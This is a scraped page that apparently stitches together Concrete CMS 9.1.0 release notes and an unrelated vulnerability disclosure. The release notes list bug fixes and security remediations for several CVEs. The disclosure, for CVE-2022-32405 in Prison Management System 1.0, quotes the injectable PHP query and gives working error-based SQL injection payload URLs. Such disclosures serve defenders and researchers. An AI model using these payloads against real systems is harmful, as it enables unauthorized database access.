*   Fixed: Clipboard - Unable to remove broken clipboard entries/clipboard doesnt remove deleted blocks
*   Fixed: When placing a stack, the edit mode menu is not displayed
*   Fixed: Adding Options To Option List Page Attribute Undefined Array Key under PHP 8
*   Fixed: Multilingual copy site tree with alias pages (thanks hissy)
*   Fixed: v9 Elemental Block Edit Nav Tabs Broken (thanks ccmEnlil)
*   Fixed: Error in updating package from marketplace incorrectly displaying itself under certain conditions (thanks JohnTheFish)
*   Fixed: Accordion block editing interface rich text editor doesn’t have access to Concrete-specific features like file manager, sitemap, etc…
*   Fixes ErrorException - Undefined property: Concrete\\Core\\Permission\\Access\\Entity\\GroupCombinationEntity::$label under PHP 8 (thanks 1stthomas)
*   Legacy form's "reply to this email address" checked state was not properly passed (thanks katzueno)
*   Fixed errors with the legacy form (thanks mlocati)
*   Fixed: Updating an express form handle can result in a table name that is too long for mysql
*   Fix several user search fields not retaining their selected values (thanks mnakalay)
*   Fixed: install with Elemental full fails due to undefined array key "titleFormat" under PHP 8
*   Fix YouTube block responsive size class issue (thanks katalysis)
*   Fixed Marketplace dashboard page broken under PHP 8
*   Conversation rating stars now appear properly (thanks deek87)
*   Fixed inability to remove an entry from the trash when that entry is an alias to an external link (thanks Ruud-Zuiderlicht)
*   Fixed bug where core “Parallax Image” area custom template (deprecated) now works again
*   Fix a bug with having multiple image blocks with on-hover attribute set on the page didn’t work reliably (thanks evgk)
*   Fixed: Toolbar title styling interfering with intelligent search results in accessibility mode (thanks Mesuva)
*   Fixed: Switch Language block default view does not work
*   Fixed inability to use the “Express Entry Selector Multiple” form control type.
*   \[V9 RC\]Fixed cookie not being cleared properly to open "add block panel" when using the sticky add panel and installing Concrete in a sub-directory
*   Fixed: Position of the reCAPTCHA badge not shown correctly after saving
*   Fixed errors in waiting for me when groups or users were deleted.
*   Fix inability to set storage location from file details Dashboard page.
*   Fixed bugs with thumbnails on alternate storage locations (thanks mnakalay)
*   Fixed: concrete.debug.hide\_keys' not working on Globals do to commented Code
*   Fix IpAccessControlService check against specific access control category (thanks mlocati)
*   Access Control: fix sorting categories in the dashboard page (thanks mlocati)
*   Fixed bug: When there's no time window, we currently ban IP addresses forever, even if we configure Concrete to only ban for X seconds. (thanks mlocati)
*   Fixed bug: "Illegal mix of collations" when running reindex task when running under certain database conditions.
*   Added “snippet.png” back into rich text editor so you can see that button.
*   Fixed: Removing Author User From Page Attributes & Saving Throws Error
*   Fixed: Deleting Containers throws Access Denied error under certain in-page editing conditions.
*   Fixed: Rich Text Page Attribute Composer "Source" Editing Hindered By Composer Autosave
*   Fixed a bug in image processing (Imagine Library) that could lead to segmentation faults under certain conditions (thanks mlocati)
*   Fixed: PlaceholderService error in thumbnail overview (thanks haeflimi)
*   Fixed: Deleting Containers shows multiple delete modal windows under certain in-page editing conditions.
*   Fixed: Top navigation block always loads the default site tree even in multilingual sites (thanks danklassen)
*   Fixed inability to override session handler to database in config prior to installation and then install successfully.
*   Fix missing none option in attribute display block (thanks JohnTheFish)
*   Fixed: Stacks with no approved versions do not appear in stacks list

**Backward Compatibility Notes**

*   The Concrete\Core\Express\Form\Validator\Routine\RoutineInterface class and all classes that implement it has changed. The validate method now takes a nullable third parameter for the Concrete\Core\Entity\Express\Entry object that may or may not exist. This replaces the request type attribute. The request type can now be inferred - if the entry does not exist, we assume this to be an ADD operation. If the entry exists within the validate method, you are running an UPDATE operation.
*   Block::duplicate() has changed its secondary parameter from $isCopiedWhenPropagated to $controllerMethodToTryAndRun. This lets us choose duplicate_master or the new duplicate_clipboard in certain situations. It is very unlikely that this should impact any custom code you have written as this is pretty deep in the Concrete internals.
*   If you have customized the Document Library view template, please ensure that your <form> tag has a valid input button with the name ”search”. This is checked in the controller in order to ensure searching is actually occurring. If you want to search by advanced file attributes, you’ll need this to be in place or else the Document Library controller will not check for attribute searching.

**Developer Updates**

*   Added on_page_version_delete event (thanks hathawayweb)
*   Mail Importer code running on ancient Zend Mail code updated to PHP 7+ (thanks KevinBLT)
*   Patches to third party libraries to allow for installation on PHP 8.1 w/Composer (thanks mlocati)
*   htmlawed HTML sanitization library updated for better compatibility with HTML5.
*   IP Access Control: add IpAccessControlCategory::describeTimeWindow() (thanks mlocati)
*   Allow Date service class to work with DateTimeImmutable objects (thanks mlocati)
*   Improvements and bug fixes to route building and controller syntax (thanks mlocati)
*   More reliable running of on\_start() in block controllers before page contents are rendered (thanks hissy)
*   Moved concrete5/dependency-patches to the core composer.json instead of the separate composer project (thanks mlocati)
*   Improved code commenting throughout all core blocks (thanks deek87)
*   Fix list\_syntax rule of PHP-CS-Fixer (thanks mlocati)
*   Significant list of third party PHP script minor updates.
*   Simplify c5:exec return code (thanks mlocati)
*   Fixed: Task scheduling command is incorrect on dashboard page and in documentation, needs more detail
*   Concrete\Core\Http\ResponseFactory used to take $session as its first constructor dependency, even though that was not used. This caused problems in the event response factory was used prior to sessions being available or being configured for database sessions that were not yet installed. This parameter has been removed. If you use the $app->make() method of building this class, you should not be affected.
*   Now using https:// for communication with the Concrete marketplace even when the user’s site is not https://

**Security Fixes**

*   Fixed several places where we weren’t sanitizing file names in the file manager and stacks page.
*   Remediated CVE-2022-21829 - Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below can download zip files over HTTP and execute code from those zip files which could lead to an RCE. Fixed by enforcing ‘concrete\_secure’ instead of ‘concrete’. Concrete now only makes requests over https even if a request comes in via http. Concrete CMS security team ranked this 8 with CVSS v3.1 vector: AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H Credit goes to Anna for reporting on HackerOne - https://hackerone.com/reports/1482520
*   Remediated CVE-2022-30117 - Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below allowed traversal in /index.php/ccm/system/file/upload which could result in an Arbitrary File Delete exploit. This was remediated by sanitizing /index.php/ccm/system/file/upload to ensure Concrete doesn’t allow traversal and by changing isFullChunkFilePresent to have an early false return when input doesn't match expectations.Concrete CMS Security team ranked this 5.8 with CVSS v3.1 vector AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H. Credit to Siebene for reporting https://hackerone.com/reports/1482280
*   Remediated CVE-2022-30120 - XSS in /dashboard/blocks/stacks/view\_details/ - old browsers only. When using an older browser with built-in XSS protection disabled, insufficient sanitation where built urls are output can be exploited for Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below to allow XSS. This cannot be exploited in modern-day web browsers due to an automatic input escape mechanism. Dashboard Stacks page sort URLs are now sanitized. Concrete CMS Security team ranked this vulnerability 3.1 with CVSS v3.1 Vector AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N. Sanitation has been added where built urls are output. Credit to Bogdan Tiron from FORTBRIDGE (https://www.fortbridge.co.uk/ ) for reporting https://hackerone.com/reports/1363598
*   Remediated CVE-2022-30119 - XSS in /dashboard/reports/logs/view - old browsers only. When using Internet Explorer with the XSS protection disabled, insufficient sanitation where built urls are output can be exploited for Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below to allow XSS. This cannot be exploited in modern-day web browsers due to an automatic input escape mechanism. Concrete CMS Security team ranked this vulnerability 2 with CVSS v3.1 Vector AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N. Sanitation has been added where built urls are output. Thanks zeroinside for reporting https://hackerone.com/reports/1370054
*   Remediated CVE-2022-30118 - XSS in /dashboard/system/express/entities/forms/save\_control/\[GUID\]: \\ old browsers only. When using Internet Explorer with the XSS protection disabled, editing a form control in an express entities form for Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below can allow XSS. This cannot be exploited in modern-day web browsers due to an automatic input escape mechanism. Concrete CMS Security team ranked this vulnerability 2 with CVSS v3.1 Vector AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N. Thanks zeroinside for reporting https://hackerone.com/reports/1370054

CVE-2022-30120: 9.1.0 Release Notes :: Concrete CMS

Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the 'id' parameter at /pms/admin/prisons/view_prison.php:4

**CVE-2022-32405****Info****Prison Management System 1.0 - SQL Injection  
****Vendor Homepage : https://www.sourcecodester.com/  
****Software Link : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html**

\[+\] Vulnerability : SQL Injection  
\[+\] Vulnerability Location : $_GET['id'] in /pms/admin/prisons/view_prison.php:4

$qry = $conn\->query("SELECT \* from \`prison\_list\` where id = '{$\_GET\['id'\]}' and delete\_flag = 0 ");

**PoC**

*   Payload :

    # Error Based
    http://localhost/pms/admin/prisons/view_prison.php?id=1'-if(database()='pms_db',0,1)%23
    

*   True : http://localhost/pms/admin/prisons/view_prison.php?id=1'-if(database()='pms_db',0,1)%23 
*   False : http://localhost/pms/admin/prisons/view_prison.php?id=1'-if(database()='wrong',0,1)%23

Tag

#sql